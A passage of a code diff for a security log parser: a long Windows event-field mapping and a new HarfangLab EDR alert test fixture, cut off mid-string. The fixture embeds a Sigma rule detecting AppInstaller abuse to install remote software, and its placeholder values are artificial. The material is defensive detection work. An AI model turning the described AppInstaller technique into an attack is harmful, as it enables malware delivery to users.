+          action.properties.OriginID: "{{json_event.message.eventlog.event_data.get('Origin ID')}}"
+          action.properties.OriginName: "{{json_event.message.eventlog.event_data.get('Origin Name')}}"
+          action.properties.PageHash: "{{json_event.message.eventlog.event_data.get('PageHash')}}"
+          action.properties.ParentProcessId: "{{json_event.message.eventlog.event_data.get('ParentProcessId')}}"
+          action.properties.Path: "{{json_event.message.eventlog.event_data.get('Path')}}"
+          action.properties.Platformup-to-date: "{{json_event.message.eventlog.event_data.get('Platform up-to-date')}}"
+          action.properties.Platformversion: "{{json_event.message.eventlog.event_data.get('Platform version')}}"
+          action.properties.PolicyBits: "{{json_event.message.eventlog.event_data.get('PolicyBits')}}"
+          action.properties.PostCleanStatus: "{{json_event.message.eventlog.event_data.get('Post Clean Status')}}"
+          action.properties.PreAuthType: "{{json_event.message.eventlog.event_data.get('PreAuthType')}}"
+          action.properties.PreExecutionStatus: "{{json_event.message.eventlog.event_data.get('Pre Execution Status')}}"
+          action.properties.PrivilegeList: "{{json_event.message.eventlog.event_data.get('PrivilegeList')}}"
+          action.properties.ProcessId: "{{json_event.message.eventlog.event_data.get('ProcessId')}}"
+          action.properties.ProcessName: "{{json_event.message.eventlog.event_data.get('Process Name') or json_event.message.eventlog.event_data.get('ProcessName')}}"
+          action.properties.ProcessNameBuffer: "{{json_event.message.eventlog.event_data.get('ProcessNameBuffer')}}"
+          action.properties.ProcessNameLength: "{{json_event.message.eventlog.event_data.get('ProcessNameLength')}}"
+          action.properties.ProductName: "{{json_event.message.eventlog.event_data.get('Product Name')}}"
+          action.properties.ProductVersion: "{{json_event.message.eventlog.event_data.get('Product Version')}}"
+          action.properties.Productstatus: "{{json_event.message.eventlog.event_data.get('Product status')}}"
+          action.properties.ProfileChanged: "{{json_event.message.eventlog.event_data.get('ProfileChanged')}}"
+          action.properties.PublisherName: "{{json_event.message.eventlog.event_data.get('PublisherName')}}"
+          action.properties.PublisherNameLength: "{{json_event.message.eventlog.event_data.get('PublisherNameLength')}}"
+          action.properties.PublisherTBSHash: "{{json_event.message.eventlog.event_data.get('PublisherTBSHash')}}"
+          action.properties.PublisherTBSHashSize: "{{json_event.message.eventlog.event_data.get('PublisherTBSHashSize')}}"
+          action.properties.RTPstate: "{{json_event.message.eventlog.event_data.get('RTP state')}}"
+          action.properties.RelativeTargetName: "{{json_event.message.eventlog.event_data.get('RelativeTargetName')}}"
+          action.properties.RemediationUser: "{{json_event.message.eventlog.event_data.get('Remediation User')}}"
+          action.properties.RequestedPolicy: "{{json_event.message.eventlog.event_data.get('RequestedPolicy')}}"
+          action.properties.RequestedSigningLevel: "{{json_event.message.eventlog.event_data.get('RequestedSigningLevel')}}"
+          action.properties.RestrictedAdminMode: "{{json_event.message.eventlog.event_data.get('RestrictedAdminMode')}}"
+          action.properties.RpcCallClientLocality: "{{json_event.message.eventlog.event_data.get('RpcCallClientLocality')}}"
+          action.properties.RuleId: "{{json_event.message.eventlog.event_data.get('RuleId')}}"
+          action.properties.RuleName: "{{json_event.message.eventlog.event_data.get('RuleName')}}"
+          action.properties.ScriptBlockText: "{{json_event.message.eventlog.event_data.get('ScriptBlockText')}}"
+          action.properties.SecureRequired: "{{json_event.message.eventlog.event_data.get('SecureRequired')}}"
+          action.properties.SecurityintelligenceVersion: "{{json_event.message.eventlog.event_data.get('Security intelligence Version')}}"
+          action.properties.ServiceName: "{{json_event.message.eventlog.event_data.get('ServiceName')}}"
+          action.properties.ServiceSid: "{{json_event.message.eventlog.event_data.get('ServiceSid')}}"
+          action.properties.SeverityID: "{{json_event.message.eventlog.event_data.get('Severity ID')}}"
+          action.properties.SeverityName: "{{json_event.message.eventlog.event_data.get('Severity Name')}}"
+          action.properties.ShareLocalPath: "{{json_event.message.eventlog.event_data.get('ShareLocalPath')}}"
+          action.properties.ShareName: "{{json_event.message.eventlog.event_data.get('ShareName')}}"
+          action.properties.Signature: "{{json_event.message.eventlog.event_data.get('Signature')}}"
+          action.properties.SignatureType: "{{json_event.message.eventlog.event_data.get('SignatureType')}}"
+          action.properties.SourceID: "{{json_event.message.eventlog.event_data.get('Source ID')}}"
+          action.properties.SourceName: "{{json_event.message.eventlog.event_data.get('Source Name')}}"
+          action.properties.State: "{{json_event.message.eventlog.event_data.get('State')}}"
+          action.properties.Status: "{{json_event.message.eventlog.event_data.get('Status')}}"
+          action.properties.StatusCode: "{{json_event.message.eventlog.event_data.get('Status Code')}}"
+          action.properties.StatusDescription: "{{json_event.message.eventlog.event_data.get('Status Description')}}"
+          action.properties.SubStatus: "{{json_event.message.eventlog.event_data.get('SubStatus')}}"
+          action.properties.SubjectDomainName: "{{json_event.message.eventlog.event_data.get('SubjectDomainName')}}"
+          action.properties.SubjectLogonId: "{{json_event.message.eventlog.event_data.get('SubjectLogonId')}}"
+          action.properties.SubjectUserName: "{{json_event.message.eventlog.event_data.get('SubjectUserName')}}"
+          action.properties.SubjectUserSid: "{{json_event.message.eventlog.event_data.get('SubjectUserSid')}}"
+          action.properties.TargetDomainName: "{{json_event.message.eventlog.event_data.get('TargetDomainName')}}"
+          action.properties.TargetInfo: "{{json_event.message.eventlog.event_data.get('TargetInfo')}}"
+          action.properties.TargetLinkedLogonId: "{{json_event.message.eventlog.event_data.get('TargetLinkedLogonId')}}"
+          action.properties.TargetLogonGuid: "{{json_event.message.eventlog.event_data.get('TargetLogonGuid')}}"
+          action.properties.TargetLogonId: "{{json_event.message.eventlog.event_data.get('TargetLogonId')}}"
+          action.properties.TargetOutboundDomainName: "{{json_event.message.eventlog.event_data.get('TargetOutboundDomainName')}}"
+          action.properties.TargetOutboundUserName: "{{json_event.message.eventlog.event_data.get('TargetOutboundUserName')}}"
+          action.properties.TargetServerName: "{{json_event.message.eventlog.event_data.get('TargetServerName')}}"
+          action.properties.TargetSid: "{{json_event.message.eventlog.event_data.get('TargetSid')}}"
+          action.properties.TargetUserName: "{{json_event.message.eventlog.event_data.get('TargetUserName')}}"
+          action.properties.TargetUserSid: "{{json_event.message.eventlog.event_data.get('TargetUserSid')}}"
+          action.properties.TaskContent: "{{json_event.message.eventlog.event_data.get('TaskContent')}}"
+          action.properties.TaskName: "{{json_event.message.eventlog.event_data.get('TaskName')}}"
+          action.properties.ThreatID: "{{json_event.message.eventlog.event_data.get('Threat ID')}}"
+          action.properties.ThreatName: "{{json_event.message.eventlog.event_data.get('Threat Name')}}"
+          action.properties.TicketEncryptionType: "{{json_event.message.eventlog.event_data.get('TicketEncryptionType')}}"
+          action.properties.TicketOptions: "{{json_event.message.eventlog.event_data.get('TicketOptions')}}"
+          action.properties.TotalSignatureCount: "{{json_event.message.eventlog.event_data.get('TotalSignatureCount')}}"
+          action.properties.TransmittedServices: "{{json_event.message.eventlog.event_data.get('TransmittedServices')}}"
+          action.properties.TypeID: "{{json_event.message.eventlog.event_data.get('Type ID')}}"
+          action.properties.TypeName: "{{json_event.message.eventlog.event_data.get('Type Name')}}"
+          action.properties.Unused2: "{{json_event.message.eventlog.event_data.get('Unused2')}}"
+          action.properties.Unused3: "{{json_event.message.eventlog.event_data.get('Unused3')}}"
+          action.properties.Unused4: "{{json_event.message.eventlog.event_data.get('Unused4')}}"
+          action.properties.Unused5: "{{json_event.message.eventlog.event_data.get('Unused5')}}"
+          action.properties.Unused6: "{{json_event.message.eventlog.event_data.get('Unused6')}}"
+          action.properties.Unused: "{{json_event.message.eventlog.event_data.get('Unused')}}"
+          action.properties.User: "{{json_event.message.eventlog.event_data.get('User')}}"
+          action.properties.ValidatedPolicy: "{{json_event.message.eventlog.event_data.get('ValidatedPolicy')}}"
+          action.properties.ValidatedSigningLevel: "{{json_event.message.eventlog.event_data.get('ValidatedSigningLevel')}}"
+          action.properties.VerificationError: "{{json_event.message.eventlog.event_data.get('VerificationError')}}"
+          action.properties.VirtualAccount: "{{json_event.message.eventlog.event_data.get('VirtualAccount')}}"
+          action.properties.WorkstationName: "{{json_event.message.eventlog.event_data.get('WorkstationName')}}"
+          action.properties.ClassName: "{{json_event.message.eventlog.event_data.get('ClassName')}}"
+          action.properties.param0: "{{json_event.message.eventlog.event_data.get('param0')}}"
+          action.properties.param10: "{{json_event.message.eventlog.event_data.get('param10')}}"
+          action.properties.param11: "{{json_event.message.eventlog.event_data.get('param11')}}"
+          action.properties.param12: "{{json_event.message.eventlog.event_data.get('param12')}}"
+          action.properties.param13: "{{json_event.message.eventlog.event_data.get('param13')}}"
+          action.properties.param14: "{{json_event.message.eventlog.event_data.get('param14')}}"
+          action.properties.param15: "{{json_event.message.eventlog.event_data.get('param15')}}"
+          action.properties.param16: "{{json_event.message.eventlog.event_data.get('param16')}}"
+          action.properties.param17: "{{json_event.message.eventlog.event_data.get('param17')}}"
+          action.properties.param18: "{{json_event.message.eventlog.event_data.get('param18')}}"
+          action.properties.param19: "{{json_event.message.eventlog.event_data.get('param19')}}"
+          action.properties.param1: "{{json_event.message.eventlog.event_data.get('param1')}}"
+          action.properties.param20: "{{json_event.message.eventlog.event_data.get('param20')}}"
+          action.properties.param21: "{{json_event.message.eventlog.event_data.get('param21')}}"
+          action.properties.param22: "{{json_event.message.eventlog.event_data.get('param22')}}"
+          action.properties.param2: "{{json_event.message.eventlog.event_data.get('param2')}}"
+          action.properties.param3: "{{json_event.message.eventlog.event_data.get('param3')}}"
+          action.properties.param4: "{{json_event.message.eventlog.event_data.get('param4')}}"
+          action.properties.param5: "{{json_event.message.eventlog.event_data.get('param5')}}"
+          action.properties.param6: "{{json_event.message.eventlog.event_data.get('param6')}}"
+          action.properties.param7: "{{json_event.message.eventlog.event_data.get('param7')}}"
+          action.properties.param8: "{{json_event.message.eventlog.event_data.get('param8')}}"
+          action.properties.param9: "{{json_event.message.eventlog.event_data.get('param9')}}"
+          action.properties.TaskContentNew_Command: "{{parse_task_info_2.message.Task.Actions.Exec.Command}}"
+          action.properties.TaskContentNew_Args: "{{parse_task_info_2.message.Task.Actions.Exec.Arguments}}"
+        filter: "{{json_event.message.eventlog.event_data != null}}"
+
+      - set:
+          source.ip: "{{json_event.message.eventlog.event_data.IpAddress}}"
+        filter: "{{json_event.message.eventlog.event_data.IpAddress | is_ipaddress}}"
+
   authentication_info:
     actions:
       - set:
diff --git a/HarfangLab/harfanglab/tests/alert_4.json b/HarfangLab/harfanglab/tests/alert_4.json
new file mode 100644
index 000000000..8a3745f19
--- /dev/null
+++ b/HarfangLab/harfanglab/tests/alert_4.json
@@ -0,0 +1,112 @@
+{
+  "input": {
+    "message": "{\"log_type\":\"alert\",\"maturity\":\"stable\",\"alert_unique_id\":\"11111111-2222-3333-4444-555555555555\",\"alert_time\":\"2024-11-18T09:18:31.852+00:00\",\"@timestamp\":\"2024-11-18T09:18:31.852+00:00\",\"ingestion_date\":\"2024-11-18T09:18:31.852+00:00\",\"@event_create_date\":\"2024-11-18T09:18:31.558Z\",\"detection_date\":\"2024-11-18T09:18:31.558+00:00\",\"rule_name\":\"Package Installed via AppInstaller from the Internet\",\"rule_id\":\"aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\",\"msg\":\"Detects URL requests performed by AppInstaller in order to install a remote application.\\nAdversaries have been seen abusing the AppInstaller URI scheme (ms-appinstaller) to trick users into installing malicious software directly from Internet.\\nMicrosoft has disabled installation of remote package by default in late December 2023 but it can still be enabled via a group policy configuration.\\nIt is recommended to check if the accessed URL correspond to a known and legitimate application and if suspicious commands have been launched during the installation process.\\n\",\"type\":\"rtlogs\",\"alert_subtype\":\"process\",\"alert_type\":\"sigma\",\"status\":\"new\",\"level\":\"medium\",\"level_int\":30,\"execution\":0,\"quarantine\":4,\"details_url_request\":{\"url\":\"https://url.integration.com/test\",\"verb\":\"POST\",\"host\":\"url.integration.com\",\"event_time\":\"2024-11-18T09:18:30.550347Z\"},\"tags\":[\"attack.initial_access\",\"attack.t1189.001\"],\"mitre_cells\":[],\"agent\":{\"agentid\":\"11111111-aaaa-bbbb-cccc-222222222222\",\"hostname\":\"HOST01\",\"domain\":null,\"domainname\":\"DOMAINSI\",\"dnsdomainname\":\"intra.domain.fr\",\"ostype\":\"windows\",\"osversion\":\"10.0.19045\",\"distroid\":null,\"osproducttype\":\"Windows 10 Pro\",\"version\":\"4.2.10\",\"additional_info\":{}},\"process\":{\"commandline\":\"C:\\\\Program Files\\\\WindowsApps\\\\Microsoft.DesktopAppInstaller_1.24.25180.0_x64__8wekyb3d8bbwe\\\\AppInstaller.exe -ServerName:App.AppX9rwyqtrq9gw3wnmrap9a412nsc7145qh.mca\",\"create_time\":\"2024-11-18T09:18:29.211Z\",\"current_directory\":\"C:\\\\Program Files\\\\WindowsApps\\\\Microsoft.DesktopAppInstaller_1.24.25180.0_x64__8wekyb3d8bbwe\\\\\",\"hashes\":{\"md5\":\"b4e821b2dac20d8d2ac6889f9c3fc315\",\"sha1\":\"a53b060cfb5e23508b4f9658d904cd7cb659de7f\",\"sha256\":\"3cc3cbf238e81e92242f4c5f422d85636d1771f2ebc781c2c8de5394f0741b45\"},\"image_name\":\"C:\\\\Program Files\\\\WindowsApps\\\\Microsoft.DesktopAppInstaller_1.24.25180.0_x64__8wekyb3d8bbwe\\\\AppInstaller.exe\",\"log_type\":\"process\",\"parent_commandline\":\"C:\\\\WINDOWS\\\\system32\\\\svchost.exe -k DcomLaunch -p\",\"parent_image\":\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"parent_unique_id\":\"aaaaaaaa-1111-bbbb-2222-cccccccccccc\",\"pid\":20188,\"ppid\":1332,\"process_name\":\"AppInstaller.exe\",\"process_unique_id\":\"11111111-aaaa-2222-bbbb-333333333333\",\"size\":2860064,\"username\":\"DOMAINSI\\\\JDOE\",\"grandparent_image\":\"C:\\\\Windows\\\\System32\\\\services.exe\",\"grandparent_commandline\":\"C:\\\\WINDOWS\\\\system32\\\\services.exe\",\"grandparent_unique_id\":\"66666666-7777-8888-9999-000000000000\",\"stacktrace\":\"\",\"stacktrace_minimal\":\"\",\"ancestors\":\"C:\\\\Windows\\\\System32\\\\svchost.exe|C:\\\\Windows\\\\System32\\\\services.exe|C:\\\\Windows\\\\System32\\\\wininit.exe\",\"usersid\":\"S-1-2-3-4-5\",\"integrity_level\":\"Low\",\"session\":1,\"logonid\":1686269,\"parent_integrity_level\":\"System\",\"grandparent_integrity_level\":\"System\",\"fake_ppid\":0,\"fake_parent_image\":\"\",\"fake_parent_commandline\":\"\",\"pe_info\":{\"company_name\":\"Microsoft Corporation\",\"file_description\":\"AppInstaller.exe\",\"file_version\":\"1.24.25180.00000\",\"internal_name\":\"AppInstaller\",\"legal_copyright\":\"\u00a9Microsoft Corporation.  All rights reserved.\",\"original_filename\":\"AppInstaller.exe\",\"pe_timestamp\":\"2024-10-25T23:14:08.000Z\",\"product_name\":\"Microsoft Desktop App Installer\",\"product_version\":\"1.24.25180.0\"},\"signed\":true,\"signature_info\":{\"signer_info\":{\"serial_number\":\"1234567890\",\"thumbprint\":\"8f985be8fd256085c90a95d3c74580511a1db975\",\"thumbprint_sha256\":\"e4ab39116a7dc57d073164eb1c840b1fb8334a8c920b92efafea19112dce643b\",\"issuer_name\":\"Microsoft Code Signing PCA 2011\",\"display_name\":\"Microsoft Corporation\"},\"root_info\":{\"serial_number\":\"abcdef12\",\"thumbprint\":\"8f43288ad272f3103b6fb1428485ea3014c0bcfe\",\"thumbprint_sha256\":\"847df6a78497943f27fc72eb93f9a637320a02b561d0a91b09e87a7807ed7c61\",\"issuer_name\":\"Microsoft Root Certificate Authority 2011\",\"display_name\":\"Microsoft Root Certificate Authority 2011\"},\"signed_authenticode\":true,\"signed_catalog\":false},\"pe_timestamp_int\":1729898048,\"pe_timestamp\":\"2024-10-25T23:14:08.000Z\",\"pe_imphash\":\"714FD4ADFC932C947A3949463867BE18\",\"dont_create_process\":true,\"status\":0,\"detection_timestamp\":\"2024-11-18T09:18:31.558Z\",\"system_event_type\":\"url_request_event\",\"ioc_matches\":[],\"log_platform_flag\":0,\"sigma_rule_content\":\"title: \\\"Package Installed via AppInstaller from the Internet\\\"\\nid: aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\\ndescription: |\\n    Detects URL requests performed by AppInstaller in order to install a remote application.\\n    Adversaries have been seen abusing the AppInstaller URI scheme (ms-appinstaller) to trick users into installing malicious software directly from Internet.\\n    Microsoft has disabled installation of remote package by default in late December 2023 but it can still be enabled via a group policy configuration.\\n    It is recommended to check if the accessed URL correspond to a known and legitimate application and if suspicious commands have been launched during the installation process.\\nreferences:\\n    - https://www.microsoft.com/en-us/security/blog/2023/12/28/financially-motivated-threat-actors-misusing-app-installer/\\n    - https://learn.microsoft.com/en-us/windows/msix/app-installer/installing-windows10-apps-web\\n    - https://lolbas-project.github.io/lolbas/Binaries/AppInstaller/\\n    - https://attack.mitre.org/techniques/T1189/\\nstatus: stable\\ndate: 2023/12/28\\nmodified: 2024/01/10\\nauthor: HarfangLab\\ntags:\\n    - attack.initial_access\\n    - attack.t1189.001\\nlogsource:\\n    product: windows\\n    category: url_request\\ndetection:\\n    selection:\\n        ProcessOriginalFileName: AppInstaller.exe\\n        ProcessCommandLine|contains: -ServerName:App.AppX9rwyqtrq9gw3wnmrap9a412nsc7145qh.mca\\n\\n    exclusion_knownurl:\\n        RequestUrlHost:\\n            - download.mytobiidynavox.com # Snap.Windows.WinUI.OEM_1.30.0.3621.msixbundle\\n            - windbg.download.prss.microsoft.com # windbg.appinstaller\\n            - languagetool.org # Languagetool.Packaging_0.5.3.5_x64.msixbundle\\n            - staticcdn.duckduckgo.com # DuckDuckGo_0.61.5.0.msixbundle\\n    condition: selection and not 1 of exclusion_*\\nlevel: medium\"},\"detection_origin\":\"agent\",\"image_name\":\"C:\\\\Program Files\\\\WindowsApps\\\\Microsoft.DesktopAppInstaller_1.24.25180.0_x64__8wekyb3d8bbwe\\\\AppInstaller.exe\",\"rule_content\":\"title: \\\"Package Installed via AppInstaller from the Internet\\\"\\nid: aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\\ndescription: |\\n    Detects URL requests performed by AppInstaller in order to install a remote application.\\n    Adversaries have been seen abusing the AppInstaller URI scheme (ms-appinstaller) to trick users into installing malicious software directly from Internet.\\n    Microsoft has disabled installation of remote package by default in late December 2023 but it can still be enabled via a group policy configuration.\\n    It is recommended to check if the accessed URL correspond to a known and legitimate application and if suspicious commands have been launched during the installation process.\\nreferences:\\n    - https://www.microsoft.com/en-us/security/blog/2023/12/28/financially-motivated-threat-actors-misusing-app-installer/\\n    - https://learn.microsoft.com/en-us/windows/msix/app-installer/installing-windows10-apps-web\\n    - https://lolbas-project.github.io/lolbas/Binaries/AppInstaller/\\n    - https://attack.mitre.org/techniques/T1189/\\nstatus: stable\\ndate: 2023/12/28\\nmodified: 2024/01/10\\nauthor: HarfangLab\\ntags:\\n    - attack.initial_access\\n    - attack.t1189.001\\nlogsource:\\n    product: windows\\n    category: url_request\\ndetection:\\n    selection:\\n        ProcessOriginalFileName: AppInstaller.exe\\n        ProcessCommandLine|contains: -ServerName:App.AppX9rwyqtrq9gw3wnmrap9a412nsc7145qh.mca\\n\\n    exclusion_knownurl:\\n        RequestUrlHost:\\n            - download.mytobiidynavox.com # Snap.Windows.WinUI.OEM_1.30.0.3621.msixbundle\\n            - windbg.download.prss.microsoft.com # windbg.appinstaller\\n            - languagetool.org # Languagetool.Packaging_0.5.3.5_x64.msixbundle\\n            - staticcdn.duckduckgo.com # DuckDuckGo_0.61.5.0.msixbundle\\n    condition: selection and not 1 of exclusion_*\\nlevel: medium\",\"aggregation_key\":\"1609170aa71e23cf15ca43adc927697e071c4a4207f8d4fc9d74f7382b4e9b9c\",\"threat_type\":\"commandline\",\"threat_values\":[\"<drive>:\\\\program files\\\\windowsapps\\\\microsoft.desktopappinstaller_1.24.25180.0_x64__8wekyb3d8bbwe\\\\appinstaller.exe -servername:app.appx9rwyqtrq9gw3wnmrap9a412nsc7145qh.mca\"],\"threat_key\":1343,\"groups\":[{\"id\":\"12345678-abcd-ef90-1234-123456abcdef\",\"name\":\"DOMAIN_Postes_de_travail_Windows\"}]}",
+    "sekoiaio": {
+      "intake": {
+        "dialect": "HarfangLab EDR",
+        "dialect_uuid": "3c7057d3-4689-4fae-8033-6f1f887a70f2"
+      }
+    }
+  },
+  "expected": {
+    "message": "{\"log_type\":\"alert\",\"maturity\":\"stable\",\"alert_unique_id\":\"11111111-2222-3333-4444-555555555555\",\"alert_time\":\"2024-11-18T09:18:31.852+00:00\",\"@timestamp\":\"2024-11-18T09:18:31.852+00:00\",\"ingestion_date\":\"2024-11-18T09:18:31.852+00:00\",\"@event_create_date\":\"2024-11-18T09:18:31.558Z\",\"detection_date\":\"2024-11-18T09:18:31.558+00:00\",\"rule_name\":\"Package Installed via AppInstaller from the Internet\",\"rule_id\":\"aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\",\"msg\":\"Detects URL requests performed by AppInstaller in order to install a remote application.\\nAdversaries have been seen abusing the AppInstaller URI scheme (ms-appinstaller) to trick users into installing malicious software directly from Internet.\\nMicrosoft has disabled installation of remote package by default in late December 2023 but it can still be enabled via a group policy configuration.\\nIt is recommended to check if the accessed URL correspond to a known and legitimate application and if suspicious commands have been launched during the installation process.\\n\",\"type\":\"rtlogs\",\"alert_subtype\":\"process\",\"alert_type\":\"sigma\",\"status\":\"new\",\"level\":\"medium\",\"level_int\":30,\"execution\":0,\"quarantine\":4,\"details_url_request\":{\"url\":\"https://url.integration.com/test\",\"verb\":\"POST\",\"host\":\"url.integration.com\",\"event_time\":\"2024-11-18T09:18:30.550347Z\"},\"tags\":[\"attack.initial_access\",\"attack.t1189.001\"],\"mitre_cells\":[],\"agent\":{\"agentid\":\"11111111-aaaa-bbbb-cccc-222222222222\",\"hostname\":\"HOST01\",\"domain\":null,\"domainname\":\"DOMAINSI\",\"dnsdomainname\":\"intra.domain.fr\",\"ostype\":\"windows\",\"osversion\":\"10.0.19045\",\"distroid\":null,\"osproducttype\":\"Windows 10 Pro\",\"version\":\"4.2.10\",\"additional_info\":{}},\"process\":{\"commandline\":\"C:\\\\Program Files\\\\WindowsApps\\\\Microsoft.DesktopAppInstaller_1.24.25180.0_x64__8wekyb3d8bbwe\\\\AppInstaller.exe -ServerName:App.AppX9rwyqtrq9gw3wnmrap9a412nsc7145qh.mca\",\"create_time\":\"2024-11-18T09:18:29.211Z\",\"current_directory\":\"C:\\\\Program Files\\\\WindowsApps\\\\Microsoft.DesktopAppInstaller_1.24.25180.0_x64__8wekyb3d8bbwe\\\\\",\"hashes\":{\"md5\":\"b4e821b2dac20d8d2ac6889f9c3fc315\",\"sha1\":\"a53b060cfb5e23508b4f9658d904cd7cb659de7f\",\"sha256\":\"3cc3cbf238e81e92242f4c5f422d85636d1771f2ebc781c2c8de5394f0741b45\"},\"image_name\":\"C:\\\\Program Files\\\\WindowsApps\\\\Microsoft.DesktopAppInstaller_1.24.25180.0_x64__8wekyb3d8bbwe\\\\AppInstaller.exe\",\"log_type\":\"process\",\"parent_commandline\":\"C:\\\\WINDOWS\\\\system32\\\\svchost.exe -k DcomLaunch -p\",\"parent_image\":\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"parent_unique_id\":\"aaaaaaaa-1111-bbbb-2222-cccccccccccc\",\"pid\":20188,\"ppid\":1332,\"process_name\":\"AppInstaller.exe\",\"process_unique_id\":\"11111111-aaaa-2222-bbbb-333333333333\",\"size\":2860064,\"username\":\"DOMAINSI\\\\JDOE\",\"grandparent_image\":\"C:\\\\Windows\\\\System32\\\\services.exe\",\"grandparent_commandline\":\"C:\\\\WINDOWS\\\\system32\\\\services.exe\",\"grandparent_unique_id\":\"66666666-7777-8888-9999-000000000000\",\"stacktrace\":\"\",\"stacktrace_minimal\":\"\",\"ancestors\":\"C:\\\\Windows\\\\System32\\\\svchost.exe|C:\\\\Windows\\\\System32\\\\services.exe|C:\\\\Windows\\\\System32\\\\wininit.exe\",\"usersid\":\"S-1-2-3-4-5\",\"integrity_level\":\"Low\",\"session\":1,\"logonid\":1686269,\"parent_integrity_level\":\"System\",\"grandparent_integrity_level\":\"System\",\"fake_ppid\":0,\"fake_parent_image\":\"\",\"fake_parent_commandline\":\"\",\"pe_info\":{\"company_name\":\"Microsoft Corporation\",\"file_description\":\"AppInstaller.exe\",\"file_version\":\"1.24.25180.00000\",\"internal_name\":\"AppInstaller\",\"legal_copyright\":\"\u00a9Microsoft Corporation.  All rights reserved.\",\"original_filename\":\"AppInstaller.exe\",\"pe_timestamp\":\"2024-10-25T23:14:08.000Z\",\"product_name\":\"Microsoft Desktop App Installer\",\"product_version\":\"1.24.25180.0\"},\"signed\":true,\"signature_info\":{\"signer_info\":{\"serial_number\":\"1234567890\",\"thumbprint\":\"8f985be8fd256085c90a95d3c74580511a1db975\",\"thumbprint_sha256\":\"e4ab39116a7dc57d073164eb1c840b1fb8334a8c920b92efafea19112dce643b\",\"issuer_name\":\"Microsoft Code Signing PCA 2011\",\"display_name\":\"Microsoft Corporation\"},\"root_info\":{\"serial_number\":\"abcdef12\",\"thumbprint\":\"8f43288ad272f3103b6fb1428485ea3014c0bcfe\",\"thumbprint_sha256\":\"847df6a78497943f27fc72eb93f9a637320a02b561d0a91b09e87a7807ed7c61\",\"issuer_name\":\"Microsoft Root Certificate Authority 2011\",\"display_name\":\"Microsoft Root Certificate Authority 2011\"},\"signed_authenticode\":true,\"signed_catalog\":false},\"pe_timestamp_int\":1729898048,\"pe_timestamp\":\"2024-10-25T23:14:08.000Z\",\"pe_imphash\":\"714FD4ADFC932C947A3949463867BE18\",\"dont_create_process\":true,\"status\":0,\"detection_timestamp\":\"2024-11-18T09:18:31.558Z\",\"system_event_type\":\"url_request_event\",\"ioc_matches\":[],\"log_platform_flag\":0,\"sigma_rule_content\":\"title: \\\"Package Installed via AppInstaller from the Internet\\\"\\nid: aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\\ndescription: |\\n    Detects URL requests performed by AppInstaller in order to install a remote application.\\n    Adversaries have been seen abusing the AppInstaller URI scheme (ms-appinstaller) to trick users into installing malicious software directly from Internet.\\n    Microsoft has disabled installation of remote package by default in late December 2023 but it can still be enabled via a group policy configuration.\\n    It is recommended to check if the accessed URL correspond to a known and legitimate application and if suspicious commands have been launched during the installation process.\\nreferences:\\n    - https://www.microsoft.com/en-us/security/blog/2023/12/28/financially-motivated-threat-actors-misusing-app-installer/\\n    - https://learn.microsoft.com/en-us/windows/msix/app-installer/installing-windows10-apps-web\\n    - https://lolbas-project.github.io/lolbas/Binaries/AppInstaller/\\n    - https://attack.mitre.org/techniques/T1189/\\nstatus: stable\\ndate: 2023/12/28\\nmodified: 2024/01/10\\nauthor: HarfangLab\\ntags:\\n    - attack.initial_access\\n    - attack.t1189.001\\nlogsource:\\n    product: windows\\n    category: url_request\\ndetection:\\n    selection:\\n        ProcessOriginalFileName: AppInstaller.exe\\n        ProcessCommandLine|contains: -ServerName:App.AppX9rwyqtrq9gw3wnmrap9a412nsc7145qh.mca\\n\\n    exclusion_knownurl:\\n        RequestUrlHost:\\n            - download.mytobiidynavox.com # Snap.Windows.WinUI.OEM_1.30.0.3621.msixbundle\\n            - windbg.download.prss.microsoft.com # windbg.appinstaller\\n            - languagetool.org # Languagetool.Packaging_0.5.3.5_x64.msixbundle\\n            - staticcdn.duckduckgo.com # DuckDuckGo_0.61.5.0.msixbundle\\n    condition: selection and not 1 of exclusion_*\\nlevel: medium\"},\"detection_origin\":\"agent\",\"image_name\":\"C:\\\\Program Files\\\\WindowsApps\\\\Microsoft.DesktopAppInstaller_1.24.25180.0_x64__8wekyb3d8bbwe\\\\AppInstaller.exe\",\"rule_content\":\"title: \\\"Package Installed via AppInstaller from the Internet\\\"\\nid: aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\\ndescription: |\\n    Detects URL requests performed by AppInstaller in order to install a remote application.\\n    Adversaries have been seen abusing the AppInstaller URI scheme (ms-appinstaller) to trick users into installing malicious software directly from Internet.\\n    Microsoft has disabled installation of remote package by default in late December 2023 but it can still be enabled via a group policy configuration.\\n    It is recommended to check if the accessed URL correspond to a known and legitimate application and if suspicious commands have been launched during the installation process.\\nreferences:\\n    - https://www.microsoft.com/en-us/security/blog/2023/12/28/financially-motivated-threat-actors-misusing-app-installer/\\n    - https://learn.microsoft.com/en-us/windows/msix/app-installer/installing-windows10-apps-web\\n    - https://lolbas-project.github.io/lolbas/Binaries/AppInstaller/\\n    - https://attack.mitre.org/techniques/T1189/\\nstatus: stable\\ndate: 2023/12/28\\nmodified: 2024/01/10\\nauthor: HarfangLab\\ntags:\\n    - attack.initial_access\\n    - attack.t1189.001\\nlogsource:\\n    product: windows\\n    category: url_request\\ndetection:\\n    selection:\\n        ProcessOriginalFileName: AppInstaller.exe\\n        ProcessCommandLine|contains: -ServerName:App.AppX9rwyqtrq9gw3wnmrap9a412nsc7145qh.mca\\n\\n    exclusion_knownurl:\\n        RequestUrlHost:\\n            - download.mytobiidynavox.com # Snap.Windows.WinUI.OEM_1.30.0.3621.msixbundle\\n            - windbg.download.prss.microsoft.com # windbg.appinstaller\\n            - languagetool.org # Languagetool.Packaging_0.5.3.5_x64.msixbundle\\n            - staticcdn.duckduckgo.com # DuckDuckGo_0.61.5.0.msixbundle\\n    condition: selection and not 1 of exclusion_*\\nlevel: medium\",\"aggregation_key\":\"1609170aa71e23cf15ca43adc927697e071c4a4207f8d4fc9d74f7382b4e9b9c\",\"threat_type\":\"commandline\",\"threat_values\":[\"<drive>:\\\\program files\\\\windowsapps\\\\microsoft.desktopappinstaller_1.24.25180.0_x64__8wekyb3d8bbwe\\\\appinstaller.exe 